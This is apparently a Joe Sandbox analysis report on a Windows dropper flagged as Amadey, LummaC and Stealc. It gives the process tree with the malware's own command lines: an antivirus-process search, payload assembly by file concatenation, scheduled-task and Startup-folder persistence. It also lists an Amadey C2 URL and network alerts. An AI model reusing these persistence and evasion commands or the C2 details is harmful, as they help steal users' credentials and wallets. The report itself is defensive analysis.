Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mQRr8Rkorf.exe

Overview

General Information

Sample name:mQRr8Rkorf.exe
renamed because original name is a hash value
Original sample name:3257a90914b6dfdb338969b2a58a260a.exe
Analysis ID:1631980
MD5:3257a90914b6dfdb338969b2a58a260a
SHA1:8760b6b9e7412e1346b5427a0e92e7399d226561
SHA256:8b91be73c8fdc9e0d3f9771945bd8d6cead01382bf4b9c68fd056047c7249b8f
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected LummaC Stealer
Yara detected Stealc
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • mQRr8Rkorf.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\mQRr8Rkorf.exe" MD5: 3257A90914B6DFDB338969B2A58A260A)
    • A7B94.exe (PID: 6368 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe MD5: F5FED53F8E4B3DAD6429075E4C7C8FC6)
      • 1E08u3.exe (PID: 6468 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\1E08u3.exe MD5: E67596E44012BAC363634BE64FFB53A2)
        • rapes.exe (PID: 2668 cmdline: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: E67596E44012BAC363634BE64FFB53A2)
      • 2R0700.exe (PID: 5204 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe MD5: 3F95752BFFF9447467097A83E5F42E89)
  • rapes.exe (PID: 5588 cmdline: C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: E67596E44012BAC363634BE64FFB53A2)
  • rundll32.exe (PID: 6720 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 3556 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • rapes.exe (PID: 5588 cmdline: C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: E67596E44012BAC363634BE64FFB53A2)
    • HmngBpR.exe (PID: 5632 cmdline: "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe" MD5: 8990CE4BE7D7049A51361A2FD9C6686C)
      • SplashWin.exe (PID: 3308 cmdline: C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe MD5: 4D20B83562EEC3660E45027AD56FB444)
        • SplashWin.exe (PID: 484 cmdline: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe MD5: 4D20B83562EEC3660E45027AD56FB444)
          • cmd.exe (PID: 6512 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
    • ADFoyxP.exe (PID: 4160 cmdline: "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe" MD5: 45C1ABFB717E3EF5223BE0BFC51DF2DE)
      • cmd.exe (PID: 2996 cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • expand.exe (PID: 5716 cmdline: expand Go.pub Go.pub.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
        • tasklist.exe (PID: 3016 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 1680 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 852 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 4424 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 3588 cmdline: cmd /c md 353090 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 3904 cmdline: extrac32 /Y /E Really.pub MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 1700 cmdline: findstr /V "posted" Good MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 3552 cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 1872 cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Seat.com (PID: 3280 cmdline: Seat.com m MD5: 62D09F076E6E0240548C2F837536A46A)
          • cmd.exe (PID: 2140 cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 5248 cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 2740 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 1992 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • 9hUDDVk.exe (PID: 3328 cmdline: "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe" MD5: 87FC5821B29F5CDEF4D118E71C764501)
    • pwHxMTy.exe (PID: 4056 cmdline: "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe" MD5: D3F96BF44CD5324EE9109A7E3DD3ACB4)
      • pwHxMTy.exe (PID: 3712 cmdline: "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe" MD5: D3F96BF44CD5324EE9109A7E3DD3ACB4)
      • WerFault.exe (PID: 4980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 3028 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.com (PID: 3764 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • SplashWin.exe (PID: 4952 cmdline: "C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe" MD5: 4D20B83562EEC3660E45027AD56FB444)
    • cmd.exe (PID: 4780 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Temp\10121660101\amnew.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
              00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                0000002E.00000002.2016617729.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  00000005.00000003.1097981161.000000000069D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                      Click to see the 10 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      46.2.pwHxMTy.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                        46.2.pwHxMTy.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                          45.2.pwHxMTy.exe.4209550.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                            5.2.2R0700.exe.980000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5248, ProcessName: schtasks.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 3028, ProcessName: wscript.exe
                              Sigma detected: Publisher Attachment File Dropped In Suspicious Location
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe, ProcessId: 4160, TargetFilename: C:\Users\user~1\AppData\Local\Temp\Argentina.pub
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5248, ProcessName: schtasks.exe
                              Sigma detected: Use Short Name Path in Command Line
                              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe, ParentCommandLine: "C:\Users\user\Desktop\mQRr8Rkorf.exe", ParentImage: C:\Users\user\Desktop\mQRr8Rkorf.exe, ParentProcessId: 6276, ParentProcessName: mQRr8Rkorf.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe, ProcessId: 6368, ProcessName: A7B94.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 3028, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\mQRr8Rkorf.exe, ProcessId: 6276, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                              Sigma detected: Proxy Execution Via Explorer.exe
                              Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6512, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 5596, ProcessName: explorer.exe

                              Data Obfuscation

                              barindex
                              Sigma detected: Drops script at startup location
                              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 2740, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Sigma detected: Search for Antivirus process
                              Source: Process startedAuthor: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 4424, ProcessName: findstr.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:09:36.620361+010020283713Unknown Traffic192.168.2.749681104.21.48.1443TCP
                              2025-03-07T18:09:39.879522+010020283713Unknown Traffic192.168.2.749682104.21.48.1443TCP
                              2025-03-07T18:09:42.631774+010020283713Unknown Traffic192.168.2.749683104.21.48.1443TCP
                              2025-03-07T18:09:45.766754+010020283713Unknown Traffic192.168.2.749684104.21.48.1443TCP
                              2025-03-07T18:09:49.586233+010020283713Unknown Traffic192.168.2.749685104.21.48.1443TCP
                              2025-03-07T18:09:52.632829+010020283713Unknown Traffic192.168.2.749686104.21.48.1443TCP
                              2025-03-07T18:09:57.416531+010020283713Unknown Traffic192.168.2.749687104.21.48.1443TCP
                              2025-03-07T18:10:51.342583+010020283713Unknown Traffic192.168.2.749705104.21.112.1443TCP
                              2025-03-07T18:10:58.444445+010020283713Unknown Traffic192.168.2.749710104.21.112.1443TCP
                              2025-03-07T18:11:01.590304+010020283713Unknown Traffic192.168.2.749714104.21.112.1443TCP
                              2025-03-07T18:11:02.243174+010020283713Unknown Traffic192.168.2.749715172.67.214.226443TCP
                              2025-03-07T18:11:04.660461+010020283713Unknown Traffic192.168.2.749717172.67.214.226443TCP
                              2025-03-07T18:11:04.906297+010020283713Unknown Traffic192.168.2.749718104.21.112.1443TCP
                              2025-03-07T18:11:08.175135+010020283713Unknown Traffic192.168.2.749720104.21.112.1443TCP
                              2025-03-07T18:11:09.151172+010020283713Unknown Traffic192.168.2.749721172.67.214.226443TCP
                              2025-03-07T18:11:12.549223+010020283713Unknown Traffic192.168.2.749723172.67.214.226443TCP
                              2025-03-07T18:11:13.446712+010020283713Unknown Traffic192.168.2.749725104.21.112.1443TCP
                              2025-03-07T18:11:15.561914+010020283713Unknown Traffic192.168.2.749727172.67.214.226443TCP
                              2025-03-07T18:11:18.578862+010020283713Unknown Traffic192.168.2.749729104.21.112.1443TCP
                              2025-03-07T18:11:18.579335+010020283713Unknown Traffic192.168.2.749730172.67.214.226443TCP
                              2025-03-07T18:11:18.923250+010020283713Unknown Traffic192.168.2.749733104.21.48.201443TCP
                              2025-03-07T18:11:20.739410+010020283713Unknown Traffic192.168.2.749735172.67.214.226443TCP
                              2025-03-07T18:11:22.029618+010020283713Unknown Traffic192.168.2.749737172.67.214.226443TCP
                              2025-03-07T18:11:23.283285+010020283713Unknown Traffic192.168.2.749738172.67.214.226443TCP
                              2025-03-07T18:11:27.336987+010020283713Unknown Traffic192.168.2.749754172.67.214.226443TCP
                              2025-03-07T18:11:32.483421+010020283713Unknown Traffic192.168.2.749759104.21.48.201443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:02.834515+010020546531A Network Trojan was detected192.168.2.749715172.67.214.226443TCP
                              2025-03-07T18:11:05.961015+010020546531A Network Trojan was detected192.168.2.749717172.67.214.226443TCP
                              2025-03-07T18:11:21.249950+010020546531A Network Trojan was detected192.168.2.749735172.67.214.226443TCP
                              2025-03-07T18:11:24.126731+010020546531A Network Trojan was detected192.168.2.749738172.67.214.226443TCP
                              2025-03-07T18:11:28.187466+010020546531A Network Trojan was detected192.168.2.749754172.67.214.226443TCP
                              2025-03-07T18:11:30.609313+010020546531A Network Trojan was detected192.168.2.749733104.21.48.201443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:02.834515+010020498361A Network Trojan was detected192.168.2.749715172.67.214.226443TCP
                              2025-03-07T18:11:21.249950+010020498361A Network Trojan was detected192.168.2.749735172.67.214.226443TCP
                              2025-03-07T18:11:30.609313+010020498361A Network Trojan was detected192.168.2.749733104.21.48.201443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:18.923250+010020606581Domain Observed Used for C2 Detected192.168.2.749733104.21.48.201443TCP
                              2025-03-07T18:11:32.483421+010020606581Domain Observed Used for C2 Detected192.168.2.749759104.21.48.201443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:02.243174+010020605701Domain Observed Used for C2 Detected192.168.2.749715172.67.214.226443TCP
                              2025-03-07T18:11:04.660461+010020605701Domain Observed Used for C2 Detected192.168.2.749717172.67.214.226443TCP
                              2025-03-07T18:11:09.151172+010020605701Domain Observed Used for C2 Detected192.168.2.749721172.67.214.226443TCP
                              2025-03-07T18:11:12.549223+010020605701Domain Observed Used for C2 Detected192.168.2.749723172.67.214.226443TCP
                              2025-03-07T18:11:15.561914+010020605701Domain Observed Used for C2 Detected192.168.2.749727172.67.214.226443TCP
                              2025-03-07T18:11:18.579335+010020605701Domain Observed Used for C2 Detected192.168.2.749730172.67.214.226443TCP
                              2025-03-07T18:11:20.739410+010020605701Domain Observed Used for C2 Detected192.168.2.749735172.67.214.226443TCP
                              2025-03-07T18:11:22.029618+010020605701Domain Observed Used for C2 Detected192.168.2.749737172.67.214.226443TCP
                              2025-03-07T18:11:23.283285+010020605701Domain Observed Used for C2 Detected192.168.2.749738172.67.214.226443TCP
                              2025-03-07T18:11:27.336987+010020605701Domain Observed Used for C2 Detected192.168.2.749754172.67.214.226443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
